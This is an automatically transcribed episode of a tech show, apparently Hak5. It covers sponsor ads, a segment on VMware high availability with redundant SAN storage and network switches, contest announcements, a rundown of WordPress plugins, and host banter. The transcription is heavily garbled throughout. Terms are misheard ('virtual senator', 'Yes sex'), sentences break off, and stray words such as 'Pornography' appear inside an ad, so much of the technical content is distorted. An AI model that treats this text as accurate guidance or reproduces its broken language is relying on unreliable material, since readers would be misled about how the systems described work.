" That's right want to think Squarespace for sponsoring Lan party and I'm here on our land party page -- nifty feature it looks like I'm just on the page but get this extra button here and posts an entry and I can do just that. Fill in my details here. What's nice and get a rich text editor and it's kind of like a -- he -- easy buttons here that rich media like an added. Image here from the direct pure out. And what's nice is right there with then why copy I can go ahead and grab these little selection boxes and resize my image. Right from within my documents -- it and a volunteer community -- and take a look at how. Versus just a powerful you can get your Squarespace plan. Over Squarespace soc column use coupon code Hak5 and get 10% off the light of your service."

" Thank you Darren and up next we have some. Awesome information from -- about virtualization and over at his office was -- join us."

" Our -- so we are here back in my lovely office in Williamsburg Virginia four part two of our virtualization segment. Or intro or series if you want -- Got a lot of good feedback about the first episode that we did which was basically just a intro into the cost savings associated with virtualization. Today we're gonna do is red tape that's one more step further and instead of going into the cost benefit from going into the a disaster recovery or high availability. Women -- Dusan to show you some best practices. -- implementing a multi post. With sand connected storage. Wore like a cluster or so someone and so port. So let's go ahead and take a look at the white -- here. -- to do is -- and drop the best practices for networking. And storage so let's start with our two -- would say we've got -- to host virtual. Machines like the 900 that I mentioned yesterday. And I only said that I have one but. We don't have the money for a second one. So go ahead and start with post number one. And host number two. And these are both running. VMware yes sex three point five. So by themselves they would be you know great standalone virtual machine hosts however what we want to do is we want to actually utilize. A third box. This is gonna be our master controller or virtual senator server. Virtual senator's gonna connect these two boxes. It's gonna say hey I now -- two posts in this. Landscape if you will. And from there we can actually manage all of the virtual machines from. Virtual center server instead of logging into -- one -- it's a certain set of virtual machines or box to manage a you know another -- of virtual machines so we've got virtual center are all hooked up now we need to hook up. Networking and we do that while best practices state that you should have fully redundant. You know paths to. Each of you war hosts. So now we've got to. Network switches. Intact but we do is. You've got you know you're interconnectivity. In coming through so one to hear once there once a year one there. So now if one of these switches goes down. Switch to kicks back in and does its thing now networking is a lot easier in the new version of VMware infrastructure which now called the sphere. Horrible name great product. Which makes it setting up a data center. Network a lot easier. I don't have access to the beta but rest assured as soon as we do get access to it I'll -- and much as -- Ohio exactly setup networking. The other things you wanna do is you want to have a another set of switches. These will be you or. I SCSI switches won't mention broke that don't think we're using blue anymore but -- black. So now we've got two more -- here."

" The tank and we've got our."

" Our -- here obviously. Replicating sand is a little costly -- need to get into the EMC. You know high and people logic actually replicate sand. Stored so we're gonna do is we're actually gonna go ahead and you just like we did -- Yes so this comes down here. And then this one comes down here in this one is here and this from those here. TC aware trying to. To implement yeah this is gets a little crazy however when you think about it in terms of okay. I have one point of failure. Not gonna point one point there point one point so this really becomes then you are single. Point of failure for you know hardware wise now we can try and you know. Alleviate that by going to see a a properly architect a great fifty which is basically in the one. Is a group of -- three in my case three drives in one spindle. Three drives another spindle. Okay so these would each be raid five. In fact. And then once we have all these raid five created. We go ahead. Actually that's wrong. We actually -- these. To a raid. There are intact so. One of these each one of these is a raid five -- Which makes rebuilding should one of these drives fail. Quicker occasional at the rebuild say twelve terabyte -- And also you get the speed of striking across. Raid five -- so you've you've kind of mitigated the problem of having a centralized storage solution. Okay now the nice thing about VMware. Yes sex. Or actually should say virtual center is now bolt on applications that they have you can have. These are asks. Which is I believe dynamic resource sharing. Where it'll monitor if box one is that 80%. And box too is that 20%. You can set a threshold of I would only want these boxes to be you know peak utilization at 60% that's what. View it dot via where virtual senate will do is it will live migrate. Using storage would they called the emotion and all these products have been -- so bear with me. It'll migrate a certain number of the hands. Over here to balance wow. To your. -- To your specifications on the other nice thing is like I said with you've got down. The motion. And you can go ahead and live my great with no down time. From this -- say you have hardware failure when your ram sticks his dad or you know you've got upgrades that you need to do to the biased results some funky thing. You can actually push everything over with. Like minimal interruption in service we're talking less then. Five seconds. Where you could push all the virtual machines and then you could safely. You know bring this machine down war. You know upgraded and then from here push everything over to the same to this one. So here is the ideal. Set up for you or VMware implementation. Sand. Redundant switches. Redundant switches for your network. Redundant controllers. And if you want it to you can even have multiple virtual center controllers. Now then I guess said I gotta Lotta good comments about my set up my set up is. Like a -- beginning of last week not ideal single point failure and server. You know sands space is an an issue not only got one network. This is a very costly set up not only do two you know licensing fees what actually all the hardware that you're gonna need to purchase however. This is probably the easiest ways to do high availability which is exactly what we've got set up here. Dynamic resource sharing. Think about you know of that when your implementing a solution for us he's a software which is. Millions of dollars in in which might -- these cases this AP so. You know -- you know however much it is -- 12550000. Dollars in in implementation like this you can actually get away with. And your cap X budgets are tight. But. I really think if you haven't already. Go ahead should mean email with your questions matter Hak5 or post month forums. -- but if you have any questions about you know how to architect virtualization. I'm probably I'm sure I'm probably missed something here but. -- now me I'll be sure to answer it on an upcoming episode when we actually showed you how to. Set these things up so for more on this head on over to -- on dot com or. --"

" Our guys once again it's time to tell you guys about trivia or so the walk is called now first of all we have to talk about that monkey contest. The winner is announced right now and it's things. Spike CD you -- we went through a lot of is awesome submissions everybody did a great job I if I can give you a Little League trophy all what. But we're actually getting -- CP an epic sock monkey Amazon's that it is very -- like this pictures. From. -- There -- And that's what a legitimate -- coding challenges going on. You can get all the details. -- to challenge PHP. Two Gmail pads and a lot of fun -- so RTC's great submissions. They're still coming days to get in on it so make sure you check that out. The winner of such contests announced next week and -- 512 will win. The awesome if you reference book by -- and it is really enjoy that. And before we get to this week's. --"

" thank you so much for sponsoring this episode of tax side. If you want to make an impact online godaddy.com has what you need dot com names as low as dollars 99 plus world class hosting -- web site builders and much more. In that he is could hack one that is JK one -- can get 10% off your order. Some restrictions apply see the website for details and get your piece of the Internet and godaddy.com. Darren take --"

" Alright so here it is this week's. Contest. Saying he is actually in Easter egg hunt. So I think you guys are really going to enjoy this pixel what you already learned in this episode and apply it RTT."

" Dot Hak5. Dot org that's your only -- are right. And next week we'll talk about it and do some stuff and basically you get in on this Easter egg hunt here and find the answer. And you'll find how to submit it when you find the answer. You will be eligible to win not only a lock of matte hair but a deluxe Hak5 hack packs and -- months. So anyway I hope you guys get in on that and right now and you can get tackled British and find out about word press -- to -- your blog."

" So this past week I have been travelling all over the word press -- looking for my favorite one again so I went through hundreds of them. And I found us what would you would column. My top ten. The first one want to talk about is twit me it basically takes your blog post and transfers it straight over to Twitter. And I have up example moderate hearing just -- that this is a test an automatic medically types and whatever you want it to and it gives a link over to use. York luck. The second one I want to talk about. Is called socialite -- does pretty much the exact same thing except that works for FaceBook MySpace and Twitter. I personally like twit anymore for Twitter so I just you socialite bespoke. In MySpace so I can get all my blog post transfer Everett all sorts of different social networks at the same exact time. Sociable is pretty cool this one actually gives you. A whole bunch -- share this icons and you have 99 different ones to choose from you can choose your favorite wants to link to you. Mary -- that's all you need enough. The next one I found out about what's called mobile press this and I can actually show you on my phone it actually made it might. Log into a mobile blog. So it shows up perfectly clean and clear for anybody who wants to go on my blog on there. On their cell phones except for some reason it doesn't work from Blackberry it just works on iphones and palms. From what I know. My favorite line is can't resize at upload -- This one basically takes your images that you upload -- blog to any of your new entries. And automatically turns Bennett in two years defiant width and height and nothing over the maximum that you issues so on my site I made all of my turn. Turn out to be less than 500. No more than 500 or -- it'll copy everything on the side -- here you can see. This picture actually is about at a now 1024 by 768 or something and and I made it. A whole 500 pixels wide. The next plug in that I've found is called WP security scan. It scans your word -- installation through security vulnerabilities. In it suggests corrective action so on mine you can see I have a certain version and I have the latest stable version. I don't have any. I have a table prefix that is not WP. In at stop at the bottom it says that I have admin. An admin users that still exist I should probably fix that and it gives me some ideas on how to fix it right click the button. It says how to change we're press admin username so it gives me ideas on how to fix that. Okay word press backup that's really good tool for pretty much everybody to have it backs up pretty much your entire database of your blog and automatically emailed it to whatever email address that you want it to you. I decided to make mine emailed me. Once a week with all of my database files and one zip file it's a great program for anybody his worried about losing their information on their website. WP band is one of my favorites. I've used it since I first started off with my blog and it's very very helpful if you have anybody go into your site that spans the latter says -- thing means yet. Whatever it ends IP incipient IP ranges -- names and refer URLs that try to visit your blog. You can even redirected to go to other web sites so I have one of mine going to. I think it's this. I -- a new image. It works really well so I definitely. What you get to -- it right. The very last one that I want to tell you about is called pixel stats. Pixels stacks is basically basically very minimal. Google analytics for your website if you're not really into the whole thing in you know your interest in on how many views you have. Your interest in and a couple of those things but you don't really care about the analytics -- keywords that people actually -- then it -- to your blog. You contrivance pixels that's just gives you total views you need to use unique visitors just a couple of things that here. A little interested but not that much. If you guys have any interesting. Plug in or even widgets for your blogs that you want to check out definitely hit me up that feedback at Hak5 hour and tell me what you think."

" I think we're going to end the show now. -- go grab the guys. Hey guys that absent that an -- by. The buttons and."

" Rock and and until nine -- a huge fan of it as he is this next to stroh's and."

" It's the only download information please think before we talk about that."

" It is -- all that stuff."

" I want to let everybody knows that. Dean Klein is enemies -- they are the largest online video game rental service and offer choice of over 6000 new and classic titles -- all councils and elves which plants are you 15951. Game by members can rent one to four games at a time and keep them for as long. As they like you can also purchase a game you fall in love with it adults into the box and manual. Pornography. And on over to gain slide dot com slash Hak5 to get. Two week free trial membership -- line dot com."

" Slash -- I can't see it's. All Italy where it or just finishing that's great sounds the rent in China that they had to -- content for the hawks but."

" It's a -- game but it."

" Did send it back isn't short your plan leopard gays and our bill it's really mentions the night before so I'm always."

" Unhappy Miami's. I tell you -- abouts thinker yeah. We just watched the newest episode of Digg Reel last week it was episode number 67. -- talk to you Mythbusters."

" Yeah that's right -- but it did not have any video from the the one with the rockets smash is it's under the canals and it it."

" Flatten the -- it was so cool and what you guys gotta check it out Revision 3 dot plastic real. It's. My. Oh yeah and Andrew got zapped place. Simple it -- Clinton about it. With the yeah."

" Mr. you've got him. And Texas not -- Yes I'm checking out -- nine point four just in in this accident netbook -- next question is specifically for these talk with you so love that. And it's -- both of -- things look in one. The interface is interesting here we can just like drill down here and it's like all of these little menus and what's what's kind of -- about is when you can these programs just chill up here in the top left. And everything's like -- full screen. So oh you know. Makes it. Well. For doing one thing at a time but. Yeah I'm -- resolution on these little tiny. Bastards. It. -- Thanks it's an awesome firmware bias on. Yet just sticking to backtrack for -- years. And it's. -- Yes we asked about we can talk about getting career -- Is it only -- an ass off. For example now actually I I'll give you the list and certifications and degrees because it's really about the letters after. -- I've actually had -- hundred prefix YouTube because it makes. As an awesome blog post it's immediately along with this flash worked in and it is an excuse our industry. We'll know allocate your writer he doesn't it in a year -- completely. It is it is but here already. And you're looking for something he he actually gave a presentation did you stack is -- video it's about how to go from -- career and eighty hours or less so now president and interest that stuff and creates an expert."

" To remember guys we've got the new Hak5 website launching in the next. We episode next next week. Along with the new story that there has promised a populated with all brand new goodies I know all in there and our. Working -- and it a promotional video for you guys that you can. The really excited about -- and there were one sure who got so -- so you can honestly -- which that's true and -- Hak5 dot org slash stickers to support the show remember iTunes TiVo Miro."

" You two digit technolust are assessed weekly and we like it was the first world for the coming out. There's a reason for that this wouldn't answer -- that and also share your techno clubs. All right guys you see you next week's meantime upon -- it."

" It's."

" Like Leo how are you the girl and that's and we'll get visual basic. All going to call coming. Being used."

" That's -- week."